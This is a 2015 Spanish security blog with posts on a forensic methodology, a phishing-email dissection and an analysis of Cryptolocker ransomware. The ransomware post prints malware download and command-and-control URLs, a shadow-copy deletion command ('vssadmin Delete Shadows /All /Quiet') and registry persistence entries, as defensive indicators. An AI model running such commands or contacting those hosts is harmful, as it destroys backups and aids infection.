martes, 1 de diciembre de 2015

Metodología Forense Digital

Después de realizar algunas investigaciones, revisión de documentación y también integrando un poco de conocimiento adquirido durante los años de experiencia en el campo de la seguridad informática, a continuación publico una propuesta metodológica para llevar acabo un proceso de análisis forense digital. Espero sea de su interés y pueda recibir criticas constructivas para poder mejor el proceso. 

Metodología para el análisis forense digital


El análisis forense digital permiten conocer y resolver las preguntas: ¿Quién? ¿Cómo? ¿Cuándo? ¿Dónde? ocurrió un evento o incidente de seguridad materializado.

Con base en mi experiencia y en la participación en proyectos relacionados tomo como referencias para la habilitación de un análisis forense digital diferentes: metodologías, estándares, recomendaciones y mejores prácticas internacionales sobre cibercrimen, análisis forense digital y respuesta a incidente tales como:

  •      Publicaciones especiales:


a. NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response
b.    NIST SP 800-44, Guidelines on Securing Public Web Servers
c.     NIST SP 800-45, Guidelines on Electronic Mail Security
d.    RFC 3227: Guidelines for Evidence Collection and Archiving
e.     NIST SP 800-101 Guidelines on Mobile Device Forensics
f.     NIST SP 800-83 Guide to Malware Incident Prevention and Handling
g.    Computer Forensics Tool Testing (CFTT) 


El resultado del estudio de estas metodologías y estándares es la adopción de una metodología propia la cual es adaptable al ambiente en que se implementa, tomando en consideración las necesidades del negocio o el tipo de adquisición, preservación, examinación y/o análisis a realizar. La siguiente ilustración permite visualizar de forma gráfica la metodología propuesta para la ejecución de un análisis forense digital.



              
Ilustración Metodología para la habilitación del Servicio de Análisis Forense.


Fase1: Planeación y preparación del servicio.


Es la fase de arranque del análisis forense digital en al cual los analistas en forenses digital definirán en conjunto con el personal que el INTERESADO asigne:

  • Objetivo y alcance del servicio (redacción clara y precisa sobre el delito a perseguir o imputar).
  • Identificación de los medios sujetos a investigación y presuntos involucrados en el delito a imputar. 
  • Solicitud de Incautación de medios y/o Generación de acuse y/o solicitud de medios legales para la extracción de los activos o medios que contiene los datos a analizar. 
  • Definición, aseguramiento y preservación de la escena o dispositivos sujetos a investigación. 
  • Definición del alcance, objetivo(s) y limitaciones a las cuales está sujeta la investigación. 
  • Definición del(os) cuestionario(s) y entrevistas adecuadas para conducir la investigación. 
  • Establecer y definir los acuerdos de confidencialidad entre los ingenieros especialistas y EL INTERESADO
  • Definición y entrega del plan de trabajo: serán definidos las tareas y procesos a ejecutar, su tiempo de ejecución, responsable de cada actividad así como la matriz de escalamiento.

Fase 2 Adquisición de medios.

Previa a realizar la etapa de colección de los medios el analista en forense digital procede a tomar fotografías y notas sobre el estado en que se encuentra el equipo en cuestión.

El primer paso y tarea principal para llevar a cabo una correcta investigación durante el proceso de análisis forense es la recolección de los datos. Los especialistas en análisis forense digital una vez obtenida la orden de incautación de los medios procederán a substraer la información relevante (CD, DVD, pent drive, USB, PCMCIA, Discos duros externos, Cámaras fotográficas, Teléfonos inteligentes, Impresoras, Equipos de cómputo personal, Servidores, Datos Volátiles y no volátiles, Equipos de telecomunicación y/o seguridad personal, bitácoras de los eventos etc) para su posterior preservación y análisis. De manera enunciativa más no limitativa la fase de recopilación de datos sobre los medios abarca alguna o varias de las siguientes etapas:

  • Desarrollo de plan para colección de los datos incluidos en los medios. 
  • Colección de datos en los medios. 
  • Verificación de integridad de los datos. 
  • Preservación de los datos
  • Cadena de custodia

Una vez incautado los medios electrónicos a examinar estos deberán ser trasladados aun sitio con las capacidades adecuadas para su examinación como puede ser un laboratorio forense.

Algunos estándares importantes que debería cumplir un laboratorio forense adecuado son:

  • Cumplimiento de la ISO17025
  • System Safety según H SystSäkE
  • Protección contra incendios EN 15004-1:2008
  • Condiciones climáticas extremas STANAG 2895
  • Filtración NRBQ (AEP-54)
  • Compatibilidad electromagnéticaDEF STAN 59-411
Así como una arquitectura de seguridad que contemple al menos:

  • Protección perimetral y red independiente.
  • Segregación de actividades. RBAC
  • Sistemas de seguridad física
  • Sistemas de resguardo seguro


Fase3 Examinación

Después de realizar una copia o clonación lógica/física o bit a bit de los medios originales recabados, los analistas en forense digital procederán a examinar los datos con la finalidad de acotar la información a analizar. La examinación de los datos se realizará por medio de herramientas especializadas y siempre en un modo de solo lectura evitando de este modo la alteración o modificación de la información que contienen. 

Una vez examinados los datos el siguiente paso que realizan los analistas en forense digital es la extracción de la información para la cual el esfuerzo o tiempo dedicado puede variar dependiendo el estado en que se encuentre la información (e.g encriptación de la información o protección de documentos con credenciales). Alguno o varios de los puntos que los analistas en forense digital debemos de tomar en consideración al momento de la examinación de los datos son de manera enunciativa más no limitativa:

  • Localización de la información. 
  • Uso de visualizador de archivos. 
  • Descomprimir archivos. 
  • Identificar archivos conocidos. 
  • Búsqueda de patrones y cadenas. 
  • Metadatos de los archivos. 
  • Tiempo de Modificación Acceso y Creación de los archivos (MAC). 
  • Extracción de la información.

Para cada dato extraído es importante calcular su valor matemático (hash) para corroborar su autenticidad y validar su integridad antes de pasar a su análisis. Así mismo los procedimientos y métodos por los cuales fueron obtenida la información son registrados en la cadena de custodia para que en su momento un auditor externo o perito en la materia pueda llevar acabo la reconstrucción de los hechos y las evidencias puedan pasar los filtros de aceptabilidad estipulados por las leyes Mexicanas o dictados por profesionales en la materia.

Fase 4 Análisis

Una vez extraída la posible información se plantearan hipótesis sobre los hechos que ayuden a correlacionar los eventos contestando de esta forma a las preguntas planteadas ¿Quién? ¿Cuándo? ¿Cómo? Y ¿Por qué?, permitiendo nos concluir en las evidencias relacionadas con el caso o en su defecto sustentar la necesidad de mayor evidencia para poder ejercer un dictamen.

Fase 5 Reporte o Dictamen

Durante la última fase de análisis forense digital, los analistas en forense digital  en conjunto con el personal jurídico especializado revisarán los indicios y elaboraran un dictamen que aunque estén respaldados en procedimientos técnicos describan de forma clara y concisa los resultados, de tal forma que puedan ser comprendidos por aquellos que no conocen o dominen el lenguaje técnico de las Tecnologías de la Información. 

La finalidad es presentar dictámenes apoyados con indicios  que sean irrefutables al presentarlos ante una Corte Legal. De manera enunciativa más no limitativa este punto incluye:

  • Generar dictámenes correspondientes a las investigaciones realizadas como producto de un Análisis Forense Digital, el cual toma en cuenta el tipo de persona al que debe ser entregado evitando de esta forma el contenido técnico, libre de la jerga propia de la disciplina, pedagógico y sobre manera, consistente con las evidencias y hechos recabados durante el análisis forense digital. 


  • Un dictamen o Reporte técnico sobre un análisis forense debe incluir de manera enunciativa mas no limitativa los siguientes rubros:


o    Explicación clara del objetivo del Dictamen Pericial y el motivo por el cual se realizó el determinado estudio.
o    Antecedentes que originaron el análisis forense digital
o    Planteamiento del problema
o    Identificación del material objeto de estudio
o    Consideraciones técnicas
o    Establecimiento a detalle del desarrollo del análisis forense
o    Evidencias
o    Conclusión o conclusiones a las que se llegaron
o    Rúbrica del Autor del Dictamen Pericial
o    Secciones complementarias (glosario, apéndice y/o anexos)
A continuación enuncio algunos artículos del código penal federal Mexicano y de la ley de instituciones de crédito dirigidas a castigar los delitos informáticos:

  • Código Penal Federal artículo 211 bis 1 al 7. Define las  sanciones a interponer en caso de un delito informático. 
  • El Código Penal Federal en su artículo 201:  Delitos de pornografía infantil
  • Ley de Instituciones de Crédito artículo 52. Fraudes electrónicos. 
  • Ley Federal de Protección de Datos en Posesión de Particulares

"Hay algunos puntos que aun la ley mexicana no logra abarcar y en los cuales se encuentra muy ambigua y claro oscuro sin embargo esperamos que en un futuro muy cercano estas brechas puedan ser cerradas y clarificadas para que un proceso de esta magnitud sea lo más legible y transparente evitando presuntos culpables y violaciones a los derechos humanos de los individos."

Fase 6 Resguardo de activos y Borrado seguro


Una vez entregado el reporte o dictamen del análisis forense y firmado de conformidad por la persona a cargo del servicio asignado por el INTERESADO, los ingenieros especialista en análisis forense digital en conjunto con el personal asignado por el INTERESADO procederán a realizar la eliminación, depuración o resguardo de toda aquella evidencia y activos generados durante el proceso de análisis forense digital y al cual únicamente será permitido el acceso a personal autorizado.


Agradezco a la colaboración de colegas como Oscar Santoyo Ayala y Juan Isaias Calderón por sus comentarios y aportes ha este documento.
Publicadas por a la/s No hay comentarios.:

viernes, 27 de noviembre de 2015

El ciberfraude (Phishing)

En nuestro día a día ha sido común el escuchar de: familiares, amigos,compañeros de trabajo, colegas etc. Sobre correos electrónicos que han recibido ofreciendo les:

  • Jugosas remuneraciones económicas
  • Retenciones monetarias en sus cuentas bancarias.
  • Solicitudes sobre cambios de sus credenciales bancarias
  • Herencias ofrecidas por desconocidos
  • Atrasos en sus contribuciones al erario público.
  • ETC 
 Sin embargo todas y cada una de estos correo electrónicos son herramientas utilizadas por personas mal intencionadas que buscan poder tener acceso a información sensible o personal (Personally identifiable information (PII), or Sensitive Personal Information (SPI) por sus siglas en inglés) de la víctima especialmente la de sus cuentas bancarias.

De acuerdo al informe de Kaspersky sobre Spam y Phishing. Durante el primer trimestre de 2015, los productos de Kaspersky Lab registraron 50.077.057 reacciones del sistema antiphishing, lo que supone un aumento de un millón con respecto al último trimestre de 2014, según el Informe de Spam y Phishing de Q1 de la compañía.*

Se desconoce el impacto monetario ocurrido en México durante el 2015, sin embargo en México durante el año 2013 la cifra en perdidas fue de 3000 millones de dollars.** ¡Alarmante no creen!

¿Qué es el phishing?

El phishing o señuelo no es considerado un malware aun que muchas veces nos dirigimos a él como tal. De acuerdo al NIST 800-83, el phishing es un método implementado por personas anómalas para redirigir la navegación de sus víctimas hacia sitios clonados o ficticios como por ejemplo: un portal bancario, un portal de una red social o de una institución gubernamental con el objetivo de robar su información personal y/o sensible.

El método más común implementado es el envío de correos electrónicos masivos por ejemplo:

Correo Buenos días muy costoso (e)


Correo de aviso de Whatsapp VoiceMail

¿Alguno de ustedes los abriría? Pues a quién no le caería bien recibir de una mujer "supuesta mente en su lecho de muerte" 850,000 Euros o quién hoy en día no es un obsesionado con la mensajería instantánea de WhastApp y le llamaría mucho la atención el saber ¿quién le dejo un buzón de voz?.

La disección a Phishing.

Primer caso: WhastApp voicemail.

Este caso lo vamos a matar muy rápido con el siguiente mensaje directamente del fabricante de la aplicación:

"Primero, es importante entender que no te enviamos mensajes por WhatsApp. Tampoco te enviamos correos electrónicos sobre los chats, los Mensajes de voz, el sistema de pago, los cambios en la aplicación, o multimedia como fotos y vídeos. Solo recibirás un correo de WhatsApp si nos enviaste un correo a uno de nuestras direcciones de correo electrónico, como las del Equipo de Soporte."***

Sin la necesidad de investigar más afondo el coreo podemos concluir entonces que se trata de un correo fraudulento y no es emitido por whastapp.

Segundo caso: Buenos días muy costoso (e)

 Antes de revisar los encabezados del correo podemos hacer las siguientes deducciones de acuerdo a la redacción:

  1.  Fecha de nacimiento. La persona debe tener al rededor de 69 ya que su fecha de nacimiento es el  15 de Julio 1946 y la foto que nos muestran es de una persona de edad avanzada.
  2. Es de nacionalidad francesa y su redacción en el correo esta muy revuelta o confusa pero es capas de sobresaltar la cantidad ofrecida, su correo electrónico y sobre todo sus agradecimientos al termino de su mensaje.
  3. Hay que poner nos a pensar un poco: "En verdad tendré tanta suerte para que una mujer de 69 años me quiera heredar 850,000 euros (14,968,500 de pesos mexicanos). ¡Es mejor que sacar se la lotería!" 
Poniéndonos un poco más técnicos y revisando el código fuente del correo encontramos los siguiente:
  • smtp server IP is 195.238.20.111
·         mtp.mailfrom=mb580177@skynet.be
·         header.id=mb580177@skynet.be
·         Received: from mailsec115.isp.belgacom.be ([195.238.20.111])
·         From: URGENTE <mb580177@skynet.be>
·         To: irenelangley@talktalk.net
·         Message-ID: <865594771.560733.1445970879209.open-xchange@webmail.nmp.proximus.

En ningún momento de la cabecera se ve que el correo provenga directamente de la cuenta de  hippolyte.perry@hotmail.com, el SMTP no es el de hotmail al contrario esta localizado en Bélgica y la cuenta origen es del sitio skynet.be.

No desestimo que al descargar las imágenes adjuntas en el correo tengan algún tipo de Virus ya que sus cabeceras indican los siguiente:

------=_Part_560731_1657796776.1445970879204
Content-Type: image/jpeg; name=12179944_1666066683637228_1639812940_n.jpg
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename=12179944_1666066683637228_1639812940_n.jpg <--- Por que una imagen tiene un nombre tan extraño.
 
 
------=_Part_560731_1657796776.1445970879204
Content-Type: image/gif; name=image002.gif
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=image002.gif

En Conclusión el correo es una trampa para que la víctima caiga en un ciberfraude, envíe información relevante comprometiendo así la integridad y seguridad de sus datos.
 

Como evitar el phishing

  1. Nunca abran correo electrónicos de personas desconocidas.
  2.  Si te llego algún correo de instituciones bancarias o SAT no respondas inmediatamente, contacta al centro de atención y corrobora que sea legitimo. 
  3. Cuenta con un sistema de Antivirus instalado y actualizado en tu ordenador por si de casualidad abriste el correo y descargaste algún objeto embebido.

* Dato obtenido de http://latam.kaspersky.com/mx/node/18463
** Dato obtenido de http://mexico.cnn.com/tecnologia/2014/06/03/mexico-entre-los-paises-latinoamericanos-mas-afectados-por-el-cibercrimen
***Dato tomado de https://www.whatsapp.com/faq/es/general/28030005
Publicadas por a la/s No hay comentarios.:

viernes, 20 de noviembre de 2015

Cryptolocker una amenaza cotidiana

Recientemente los delitos informáticos, malware y robo de información o identidad han sido un trend topic en Internet en lo que ha sido este año 2015. El día de hoy me daré a la tarea de publicar de manera flexible a través de este portal el comportamiento común de un Blended Attack que ha infectado a miles de servidores, estaciones de trabajo y equipo personal al rededor del mundo y conocido como Cryptolocker.

¿Qué es un Cryptolocker?


 Un Cryptolocker es un pieza de código malintencionado que tiene el objetivo de cifrar los documentos alojados en un host, algunos de las extensiones que más ataca el malware de manera enunciativa más no limitativa son: .doc, .docx, .xls, .xlsx, .txt, .pdf, .ppt, .pptx, etc. Una vez cifrados los documentos el usuario recibe una alerta de notificación en la cual se advierte que su información ha sido "secuestrada" y para poder realizar la recuperación de su información deberá de pagar un "rescate" que va desde una tarifa inicial de 100 US/Eur hasta 500 US/Eur. El pago puede ser emitido a través de dinero electrónico mejor conocido como Bitcoins, transferencias bancarias o en persona.


El monto de la tarifa inicial de rescate aumenta conforme ha transcurrido el plazo de tiempo limite de pago estipulado por los atacantes para recuperar tu información. A continuación un ejemplo:

 

Este tipo de delito informático en el último trimestre del 2014 logro infectar a más de 650,000 víctimas al rededor del mundo, cifro 5.25 billones de archivos y obtuvo una remuneración de hasta 1.1 millones*. En el 2015 esta cifra será superada y por mucho.

¿ Cómo funciona?

 Existen varios métodos o aristas que los usuarios anómalos pueden utilizar para engañar al host o usuario y que estos a su vez instalen el malware. Algunos de los mecanismos más comunes implementados por los atacantes pueden ser:

  1. Cookie tracking (Mecanismo implementado para adquirir el comportamiento de navegación de un usuario usualmente instalado en las barras de búsqueda de los exploradores de Internet)
  2. Phishing (Envió de correos falsos)
  3. Trojanos (software que parece legitimo pero no lo es)
  4. Sitios ficticios o clonados.
 El usuario no percibe a simple vista la descarga o instalación del código malicioso ya que esté va explícitamente inscrito en el payload HTTP y se ejecuta en el background del ordenador a continuación un ejemplo claro de lo que ocurre:

Uac
Service
Background Intelligent Transfer Service



GET   /administrator/components/com_content/views/3010crypt.exe HTTP/1.1 Server   Apache/2
Cache-Control   no-cache Last-Modified   Thu, 19 Nov 2015 13:07:51 GMT
Connection   close ETag   "4d060e-22800-524e4723877c0"
Pragma   no-cache Accept-Ranges   bytes
User-Agent   Mozilla/4.0 Content-Length  141312
Host   mathmf.com Connection   close
HTTP   1.1 200 OK Content-Type   application/x-msdownload
Date   Thu, 19 Nov 2015 16:17:24 GMT


 Como todo buen malware el archivo binario se aloja y ejecuta en carpetas con permisos privilegiados como por ejemplo en el caso de windows es la carpeta Temp, una vez alojado en la carpeta privilegiada el archivo muta a una versión diferente para que los mecanismo de protección como los es un Antivirus les sea más difícil detectarlo.

El siguiente paso sería contactar a los servidores de Command and Control para enviar información relevante sobre el equipo tal como puede ser:

  1. El nombre de la máquina
    •  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName
  2. El tipo de sistema operativo y su versión
    •  \REGISTRY\USER\S-1-5-21-XXXXXXXXX\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
El servidor Command and Controll recibe la información, la procesa y envía comandos específicos al malware para comenzar a cifrar la información a continuación una muestra de los intentos de conexión hacia los equipos de comando y control:

TCP_MISS/200 GET http://kremasi.com/cgi-sys/suspendedpage.cgi? HIER_DIRECT/119.82.226.8
TCP_MISS/200 POST http://doormattx.com/CDography/images/1.php? HIER_DIRECT/205.134.238.142
TCP_MISS/200 POST http://familyiqblog.com/wp-content/themes/twentyeleven/3.php? HIER_DIRECT/199.101.183.130
TCP_MISS/200 POST http://gibaralawplus.com/1.php? HIER_DIRECT/104.18.45.110
TCP_MISS/200 POST http://id-protect.org/wp-admin/css/1.php? HIER_DIRECT/208.92.162.53
TCP_MISS/200 POST http://konutturk.net/1.php? HIER_DIRECT/5.250.245.39
TCP_MISS/200 POST http://mejdu.com/themes/default-bootstrap/3.php? HIER_DIRECT/217.174.156.20
TCP_MISS/200 POST http://normi-int.com/contact_form/1.php? HIER_DIRECT/103.11.75.15
TCP_MISS/200 POST http://shsbrawley.org/Pics/_notes/3.php? HIER_DIRECT/192.254.224.91
TCP_MISS/200 POST http://soznanie.net/1.php? HIER_DIRECT/192.187.108.171
TCP_MISS/200 POST http://thornhillmovers.net/back-up/cgi-bin/1.php? HIER_DIRECT/192.185.233.169
TCP_MISS/200 POST http://warnaaseliprinting.com/css/themes/2.php? HIER_DIRECT/182.253.224.219

En este punto el malware recibe la llave publica para comenzar el cifrado de los archivos así como también realizar tareas de: limpieza, robo de información, mutación para pasar de ser inapercibido entre otras tareas. Estas actividades pueden hacer imposible la recuperación de la información:

Comienzo de cifrado a través de API propietarias de windows***:

  API Name:  CryptAcquireContextW   Address:  0x00407036
  Params:  [NULL, NULL, 1, 4026531840]
  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\3010crypt.exe   DLL Name:  advapi32.dll

Borrado de información permanente del sistema***:

C:\WINDOWS\system32\vssadmin.exe
  Parentname:  C:\WINDOWS\explorer.exe
  Command Line:  vssadmin.exe Delete Shadows /All /Quiet
  MD5:  cdf76989d9fe20b7cc79c9c3f7ba2d4c
  SHA1: 3eb0e4bf445a5adc70394a4ba6fd5631c64396ca

Revisa y roba información sobre el historial de navegación del usuario***:

C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat

Mutación y ejecución del malware al iniciar la computadora***:


C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Nuevo archivo
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Run\"b849c42" = C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Inico del código al prender el ordenador

¿Cómo podemos evitarlo?

 Matemáticamente es complicado realizar la recuperación de los archivos una vez cifrados ya que por lo regular el malware es programado para cifrar los archivos con algoritmos sofisticados y robustos como lo es RSA a 2048bits por lo que tardaríamos años en poder descifrar la clave. Pagar por el rescate de los datos tampoco es garantía de recuperación ya que como toda persona mal intencionada los atacantes no se conforman con poco así que es probable que exijan mayores pagos al poner se en contacto con el usuario afectado.

Recomendaciones de seguridad para minimizar un posible contagio. 

 Algunas medidas, controles y recomendaciones que podemos tomar en consideración para recuperar la información de acuerdo al NIST 800.83 y con base a mi experiencia obtenida durante los años que llevo en el campo de la seguridad informática son:

  1. Para el caso de compañías: 
    • Trabajar en un proceso de respuesta a incidentes que permita actuar ante una amenaza de malware y poder realizar su contención, remediación y principalmente la recuperación de información de los datos**.
    • Concientización de sus trabajadores sobre el uso adecuado de los activos que la compañía les provee.
  2. Para el caso de usuarios:
    • Realizar respaldos de su información en dispositivos externos como puede ser una USB o disco duro externo.
    • No abrir correos de destinatarios desconocidos y mucho menos si están en otro idioma ( "La curiosidad mato al gato" ).
    • No descargar programas de sitios desconocidos o sospechosos, realicen la descarga de sitios legítimos de los propietarios de las aplicaciones.
    • Utilicen controles de seguridad como un sistema de protección antimalware, mantener los actualizado y programado para ejecutar revisiones por lo menos dos veces a la semana (Antivirus)
    • Si llegan a tener un problema o incidente no traten de corregirlo por si mismos acudan a un centro de ayuda o con una persona especializada en la materia. ( sin ofender pero aveces los cafes internet son pequeños enjambres de virus por lo que tu equipo puede salir peor de lo que entro).

* Dato tomado de scmagazine.com
** Dato tomado de la publicación especial de NIST 800-83 Guide to Malware Incident Prevention and Handling
*** FireEye NX appliance



Publicadas por a la/s No hay comentarios.:

Introducción del blog

El presente blog tiene la finalidad de informar a través de publicaciones a todos los usuarios e interesados en el blog sobre: amenazas, malware, conceptos y mejoras en la seguridad de nuestros ordenadores y datos personales. Esta dirigido a especialistas en seguridad informática y a usuarios en general.

Me deslindo completamente sobre cualquier actividad o mal uso que los lectores le puedan dar a mis publicaciones ya que los artículos publicados tiene la finalidad de esparcir el conocimiento adquirido así como ser educativos.

Be safe!
Publicadas por a la/s No hay comentarios.:
Suscribirse a: Entradas (Atom)